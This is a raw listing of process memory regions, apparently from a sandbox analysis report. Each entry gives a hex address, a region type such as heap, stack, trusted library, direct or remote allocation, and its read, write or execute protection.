24CD0F53000
heap
page read and write
24CCF220000
heap
page read and write
24CD1107000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BDB3B000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
F994B7E000
stack
page read and write
7347000
heap
page read and write
250BC5F7000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24FAC000
stack
page read and write
24CD1789000
heap
page read and write
73EA000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1173000
heap
page read and write
24CD0F15000
heap
page read and write
2C68000
trusted library allocation
page read and write
7347000
heap
page read and write
22C6F000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
22AEF000
stack
page read and write
7347000
heap
page read and write
705E000
stack
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD10CB000
heap
page read and write
48C0000
heap
page read and write
22AAE000
stack
page read and write
7347000
heap
page read and write
24CD0EFC000
heap
page read and write
7FFB4B302000
trusted library allocation
page read and write
250BC5E0000
trusted library allocation
page read and write
84AD000
stack
page read and write
24CD0FEE000
heap
page read and write
8055000
trusted library allocation
page read and write
2BB0000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25CB0000
trusted library allocation
page read and write
24CD1762000
heap
page read and write
25670000
trusted library allocation
page read and write
250BBD61000
trusted library allocation
page read and write
22D29000
stack
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
F994473000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CCF228000
heap
page read and write
24CD10E1000
heap
page read and write
7347000
heap
page read and write
24CD0F32000
heap
page read and write
2B6D000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
F9946FC000
stack
page read and write
24FB0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1035000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BA186000
heap
page read and write
47AF000
stack
page read and write
7347000
heap
page read and write
22BF0000
remote allocation
page read and write
71AA000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD1239000
heap
page read and write
7347000
heap
page read and write
2DE7000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
24CD0EFA000
heap
page read and write
7347000
heap
page read and write
24CD0F31000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
23F61000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
719A000
heap
page read and write
7347000
heap
page read and write
8570000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
F994BFE000
stack
page read and write
24CD10F5000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
250BA390000
trusted library allocation
page read and write
25159000
heap
page read and write
24CD1876000
heap
page read and write
24CD1037000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0F8C000
heap
page read and write
24CD10A0000
heap
page read and write
7347000
heap
page read and write
24CD0FEE000
heap
page read and write
2E3E000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B340000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2B8A000
trusted library allocation
page execute and read and write
2516D000
heap
page read and write
24CD0F02000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7650000
direct allocation
page read and write
25CA0000
trusted library allocation
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
25C90000
trusted library allocation
page read and write
582E3FF000
stack
page read and write
25681000
trusted library allocation
page read and write
22F26000
trusted library allocation
page read and write
2502C000
stack
page read and write
7FFB4B1E0000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
251BF000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
587F000
remote allocation
page execute and read and write
F99574D000
stack
page read and write
24CD174E000
heap
page read and write
7347000
heap
page read and write
25CB0000
trusted library allocation
page read and write
7347000
heap
page read and write
7426000
heap
page read and write
23FC5000
trusted library allocation
page read and write
24CD108D000
heap
page read and write
2D98000
heap
page read and write
7347000
heap
page read and write
24CD108C000
heap
page read and write
7347000
heap
page read and write
7680000
direct allocation
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B310000
trusted library allocation
page execute and read and write
25D20000
trusted library allocation
page read and write
25E70000
trusted library allocation
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2DCD000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
22FB1000
trusted library allocation
page read and write
7347000
heap
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
24CCF309000
heap
page read and write
7347000
heap
page read and write
8293000
heap
page read and write
24CD0F16000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
76D7000
heap
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BC5BC000
trusted library allocation
page read and write
24CD1226000
heap
page read and write
22F21000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD176E000
heap
page read and write
7347000
heap
page read and write
7ED7000
stack
page read and write
7347000
heap
page read and write
250BCFF7000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD1227000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD10BF000
heap
page read and write
7347000
heap
page read and write
24CD0F9B000
heap
page read and write
24CD177C000
heap
page read and write
2F05000
heap
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BC5A7000
trusted library allocation
page read and write
25690000
trusted library allocation
page read and write
2B40000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
74A0000
trusted library allocation
page read and write
7FFB4B206000
trusted library allocation
page execute and read and write
24CD0FEE000
heap
page read and write
25680000
trusted library allocation
page read and write
250BDCDE000
trusted library allocation
page read and write
24CCF25F000
heap
page read and write
24CD0FD3000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
2B48000
heap
page read and write
24CD10CB000
heap
page read and write
7347000
heap
page read and write
24CD119D000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD10BF000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BDB2B000
trusted library allocation
page read and write
7347000
heap
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD0F5B000
heap
page read and write
F99467F000
stack
page read and write
7347000
heap
page read and write
25E80000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25C90000
trusted library allocation
page read and write
24CD103A000
heap
page read and write
4260000
remote allocation
page execute and read and write
24CD1876000
heap
page read and write
7347000
heap
page read and write
25D00000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
627F000
remote allocation
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250D4206000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
48F0000
direct allocation
page read and write
24CD0F63000
heap
page read and write
7347000
heap
page read and write
85D0000
direct allocation
page read and write
22F9F000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD114E000
heap
page read and write
7347000
heap
page read and write
250BC1D0000
trusted library allocation
page read and write
5AB1000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD0F77000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1063000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
8560000
trusted library allocation
page read and write
250BDDB4000
trusted library allocation
page read and write
25CA0000
trusted library allocation
page read and write
250D7000
trusted library allocation
page read and write
25106000
heap
page read and write
7F7E000
stack
page read and write
25690000
trusted library allocation
page read and write
25670000
trusted library allocation
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
251B6000
heap
page read and write
2C0E000
stack
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
24CD0F74000
heap
page read and write
7347000
heap
page read and write
27D0000
heap
page read and write
2E6E000
stack
page read and write
24CD10BF000
heap
page read and write
7310000
heap
page execute and read and write
25680000
trusted library allocation
page read and write
24CD0F37000
heap
page read and write
754B000
stack
page read and write
7347000
heap
page read and write
7600000
direct allocation
page read and write
7347000
heap
page read and write
7FFB4B2E0000
trusted library allocation
page execute and read and write
25C90000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
24CD0F7F000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7F9B0000
trusted library allocation
page execute and read and write
250D4201000
heap
page read and write
7347000
heap
page read and write
250D43D9000
heap
page read and write
24CD10E1000
heap
page read and write
24CD10F0000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
73E6000
heap
page read and write
7347000
heap
page read and write
250BDC5A000
trusted library allocation
page read and write
7FFB4B1D6000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2B80000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0FB0000
heap
page read and write
739F000
stack
page read and write
24CD0F12000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD176B000
heap
page read and write
24CD1092000
heap
page read and write
7347000
heap
page read and write
2DF0000
trusted library allocation
page execute and read and write
2ABE000
stack
page read and write
7347000
heap
page read and write
72F0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
4900000
direct allocation
page read and write
7FFB4B3D0000
trusted library allocation
page read and write
2DE5000
trusted library allocation
page execute and read and write
2A7E000
stack
page read and write
7620000
direct allocation
page read and write
7347000
heap
page read and write
24CCF255000
heap
page read and write
2DEB000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
25E80000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
25CC0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B123000
trusted library allocation
page execute and read and write
24CD1112000
heap
page read and write
24CD1110000
heap
page read and write
25CA0000
trusted library allocation
page read and write
8266000
heap
page read and write
25CA0000
trusted library allocation
page read and write
7420000
trusted library allocation
page read and write
7347000
heap
page read and write
582DEF9000
stack
page read and write
7347000
heap
page read and write
250BA3D5000
heap
page read and write
22EBC000
stack
page read and write
25670000
trusted library allocation
page read and write
22F2D000
trusted library allocation
page read and write
25CB0000
trusted library allocation
page read and write
24CD10DD000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1755000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD102D000
heap
page read and write
7347000
heap
page read and write
25CC0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
24CD0F7C000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FE0000
trusted library allocation
page read and write
250BA0F0000
heap
page read and write
7347000
heap
page read and write
250BA1CF000
heap
page read and write
25CF0000
trusted library allocation
page read and write
251AF000
heap
page read and write
7FFB4B480000
trusted library allocation
page read and write
24CD10CB000
heap
page read and write
25CD0000
trusted library allocation
page read and write
84B0000
trusted library allocation
page read and write
2562F000
stack
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
250BDB14000
trusted library allocation
page read and write
25C90000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD10CB000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
254EE000
stack
page read and write
25CF0000
trusted library allocation
page read and write
22F1E000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD0F0A000
heap
page read and write
25690000
trusted library allocation
page read and write
825A000
heap
page read and write
7347000
heap
page read and write
25E70000
trusted library allocation
page read and write
2DB4000
trusted library allocation
page read and write
B6B0000
direct allocation
page execute and read and write
250D42D0000
heap
page read and write
22DDF000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
F99487E000
stack
page read and write
7347000
heap
page read and write
2B7D0710000
heap
page read and write
F99457F000
stack
page read and write
25690000
trusted library allocation
page read and write
250BDBA6000
trusted library allocation
page read and write
24CD1100000
heap
page read and write
25673000
trusted library allocation
page read and write
7347000
heap
page read and write
7450000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
22A60000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD10A6000
heap
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD1003000
heap
page read and write
2B7D0610000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B2DA000
trusted library allocation
page read and write
24CD1031000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B390000
trusted library allocation
page read and write
7347000
heap
page read and write
73B2000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1219000
heap
page read and write
7347000
heap
page read and write
24CD110F000
heap
page read and write
25CB0000
trusted library allocation
page read and write
7347000
heap
page read and write
4880000
direct allocation
page read and write
85F0000
direct allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CCF18D000
heap
page read and write
7347000
heap
page read and write
22CDA000
stack
page read and write
7FFB4B12D000
trusted library allocation
page execute and read and write
2CBC000
stack
page read and write
7430000
trusted library allocation
page execute and read and write
7427000
heap
page read and write
2AFE000
stack
page read and write
7347000
heap
page read and write
22F61000
trusted library allocation
page read and write
7660000
direct allocation
page read and write
7347000
heap
page read and write
24CD10F1000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
22B6F000
stack
page read and write
74C0000
trusted library allocation
page read and write
7347000
heap
page read and write
7FFB4B3F0000
trusted library allocation
page read and write
251F0000
heap
page read and write
25690000
trusted library allocation
page read and write
24CD0FEE000
heap
page read and write
25C90000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
24CD1110000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0F90000
heap
page read and write
7347000
heap
page read and write
25683000
trusted library allocation
page read and write
2C50000
heap
page readonly
24CD0F6C000
heap
page read and write
7347000
heap
page read and write
82AD000
heap
page read and write
24CD0F26000
heap
page read and write
7347000
heap
page read and write
24CD0F6F000
heap
page read and write
8EB0000
direct allocation
page execute and read and write
25141000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
2B64000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7340000
heap
page read and write
7347000
heap
page read and write
250BBC4C000
heap
page read and write
2E40000
heap
page read and write
24CD177E000
heap
page read and write
25690000
trusted library allocation
page read and write
7FFB4B460000
trusted library allocation
page read and write
5CC000
stack
page read and write
7347000
heap
page read and write
24CD121E000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2DB0000
trusted library allocation
page read and write
7FFB4B1D0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7FFB4B450000
trusted library allocation
page read and write
250BBC30000
heap
page read and write
24CD10CB000
heap
page read and write
24CD1224000
heap
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
250D0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250D4190000
heap
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BA107000
heap
page read and write
7FFB4B1DC000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
80AC000
stack
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD1754000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1024000
heap
page read and write
24CD0F37000
heap
page read and write
7347000
heap
page read and write
74F0000
trusted library allocation
page read and write
250BC1E4000
trusted library allocation
page read and write
846E000
stack
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
2B7D08F5000
heap
page read and write
2B95000
trusted library allocation
page execute and read and write
2512E000
heap
page read and write
7347000
heap
page read and write
2DB3000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0F3A000
heap
page read and write
2DD6000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
24CD1070000
heap
page read and write
250BC59D000
trusted library allocation
page read and write
7347000
heap
page read and write
250BC1FD000
trusted library allocation
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0FEE000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25690000
trusted library allocation
page read and write
24CD1789000
heap
page read and write
25CA0000
trusted library allocation
page read and write
25CF0000
trusted library allocation
page read and write
7345000
heap
page read and write
7FFB4B122000
trusted library allocation
page read and write
7347000
heap
page read and write
582DFFE000
stack
page read and write
7347000
heap
page read and write
2566E000
stack
page read and write
7422000
heap
page read and write
7347000
heap
page read and write
2B30000
trusted library section
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2F8B000
heap
page read and write
24CD1239000
heap
page read and write
24CD10FF000
heap
page read and write
250BBBB0000
heap
page execute and read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1758000
heap
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2D0D000
heap
page read and write
24CD0F87000
heap
page read and write
7610000
direct allocation
page read and write
7347000
heap
page read and write
25E5E000
stack
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
24CCF248000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD174B000
heap
page read and write
24CD0FD0000
heap
page read and write
250D427B000
heap
page read and write
7347000
heap
page read and write
6C7F000
remote allocation
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
735E000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
4A90000
trusted library allocation
page read and write
7347000
heap
page read and write
22F00000
trusted library allocation
page read and write
7FFB4B430000
trusted library allocation
page read and write
4AA0000
heap
page execute and read and write
250D4196000
heap
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B360000
trusted library allocation
page read and write
25680000
trusted library allocation
page read and write
2B79000
trusted library allocation
page read and write
24CD1782000
heap
page read and write
7347000
heap
page read and write
24CD1310000
remote allocation
page read and write
7347000
heap
page read and write
250BA147000
heap
page read and write
250D42F1000
heap
page read and write
7347000
heap
page read and write
24CD1030000
heap
page read and write
7347000
heap
page read and write
24CD104A000
heap
page read and write
7347000
heap
page read and write
32BF000
stack
page read and write
7300000
trusted library allocation
page read and write
72B0000
heap
page read and write
250CC04C000
trusted library allocation
page read and write
2DA0000
trusted library allocation
page read and write
24CD178A000
heap
page read and write
7347000
heap
page read and write
22C80000
direct allocation
page read and write
24CCF18E000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
250D42A0000
heap
page execute and read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
25CA6000
trusted library allocation
page read and write
250BBD55000
heap
page read and write
7347000
heap
page read and write
7092000
heap
page read and write
7470000
trusted library allocation
page read and write
24CD1789000
heap
page read and write
7347000
heap
page read and write
24CD1789000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
7350000
heap
page read and write
24CD1740000
heap
page read and write
4AB1000
trusted library allocation
page read and write
24CD122A000
heap
page read and write
7347000
heap
page read and write
250CC05B000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250D4470000
heap
page read and write
7347000
heap
page read and write
24CD1745000
heap
page read and write
7347000
heap
page read and write
24CD1310000
remote allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BA2F0000
heap
page read and write
7347000
heap
page read and write
24CD1310000
remote allocation
page read and write
2516D000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1765000
heap
page read and write
7347000
heap
page read and write
24CD0F4E000
heap
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BBD50000
heap
page read and write
24CD0FFD000
heap
page read and write
7347000
heap
page read and write
F994977000
stack
page read and write
24CD0F4B000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD10BD000
heap
page read and write
7347000
heap
page read and write
7426000
heap
page read and write
22D40000
trusted library allocation
page read and write
582E0FE000
stack
page read and write
7426000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
71DC000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
85E0000
direct allocation
page read and write
24CD10DD000
heap
page read and write
24CD0F42000
heap
page read and write
7FFB4B3A0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7440000
trusted library allocation
page read and write
7FFB4B2D1000
trusted library allocation
page read and write
22BF0000
remote allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250E0000
heap
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
7480000
trusted library allocation
page read and write
24CD1341000
heap
page read and write
24CD10DD000
heap
page read and write
7347000
heap
page read and write
2689000
stack
page read and write
8100000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
22EFE000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
25CA0000
trusted library allocation
page read and write
255EE000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1055000
heap
page read and write
82A4000
heap
page read and write
582E4FC000
stack
page read and write
2B50000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0FD8000
heap
page read and write
2B7D08F0000
heap
page read and write
582E7FE000
stack
page read and write
7347000
heap
page read and write
25C90000
trusted library allocation
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
25CB0000
trusted library allocation
page read and write
7347000
heap
page read and write
7290000
trusted library allocation
page read and write
2516D000
heap
page read and write
250BA13D000
heap
page read and write
7347000
heap
page read and write
24FB0000
trusted library allocation
page read and write
7347000
heap
page read and write
F9941DE000
stack
page read and write
7347000
heap
page read and write
25CEE000
stack
page read and write
24CD10E1000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
5222000
trusted library allocation
page read and write
7347000
heap
page read and write
25E60000
trusted library allocation
page read and write
7347000
heap
page read and write
2B7D08F4000
heap
page read and write
7347000
heap
page read and write
250BC254000
trusted library allocation
page read and write
25690000
trusted library allocation
page read and write
7FFB4B124000
trusted library allocation
page read and write
24CD1095000
heap
page read and write
7347000
heap
page read and write
2BC0000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD0F84000
heap
page read and write
24CD0EF3000
heap
page read and write
24CD121B000
heap
page read and write
F9947FE000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
73EA000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B3E0000
trusted library allocation
page read and write
498A000
stack
page read and write
24CD0F36000
heap
page read and write
25683000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0F30000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
80EB000
stack
page read and write
742D000
heap
page read and write
73DD000
heap
page read and write
24CD0F5E000
heap
page read and write
24CD0EF0000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250D46D0000
heap
page read and write
7FFB4B440000
trusted library allocation
page read and write
250BA139000
heap
page read and write
24CD0F2A000
heap
page read and write
24CD10E1000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2DDA000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25C90000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
F99584B000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
F99477F000
stack
page read and write
22F0E000
trusted library allocation
page read and write
7347000
heap
page read and write
476E000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
75F0000
direct allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2B7D061A000
heap
page read and write
250BC212000
trusted library allocation
page read and write
2F4E000
stack
page read and write
7347000
heap
page read and write
24CD1748000
heap
page read and write
2FC0000
heap
page read and write
24CD1789000
heap
page read and write
24CD110A000
heap
page read and write
7347000
heap
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2569F000
trusted library allocation
page read and write
7FC0000
heap
page read and write
31BE000
unkown
page read and write
24CD0FB8000
heap
page read and write
72C7000
trusted library allocation
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
25E90000
trusted library allocation
page execute and read and write
250D41A0000
heap
page read and write
7347000
heap
page read and write
24CD10DD000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
2EEE000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BA370000
trusted library allocation
page read and write
2DE2000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1875000
heap
page read and write
24CD119E000
heap
page read and write
24CCF210000
heap
page read and write
2F00000
heap
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BA2D0000
heap
page read and write
8590000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BA3B0000
trusted library allocation
page read and write
24CD10A0000
heap
page read and write
582E6FE000
stack
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BDB10000
trusted library allocation
page read and write
7347000
heap
page read and write
2DBD000
trusted library allocation
page execute and read and write
25692000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B420000
trusted library allocation
page read and write
26F0000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250CBD61000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7426000
heap
page read and write
24CD0FE0000
heap
page read and write
74E0000
trusted library allocation
page read and write
9ED000
stack
page read and write
7347000
heap
page read and write
4A98000
trusted library allocation
page read and write
24CD0F56000
heap
page read and write
25E70000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD0F98000
heap
page read and write
22B2E000
stack
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
2B63000
trusted library allocation
page execute and read and write
25D10000
trusted library allocation
page execute and read and write
25CF0000
trusted library allocation
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250F0000
heap
page read and write
24CD1122000
heap
page read and write
7370000
heap
page read and write
25CA0000
trusted library allocation
page read and write
24CD10CB000
heap
page read and write
F994A7B000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7490000
trusted library allocation
page read and write
255AF000
stack
page read and write
250BBF87000
trusted library allocation
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
22D50000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
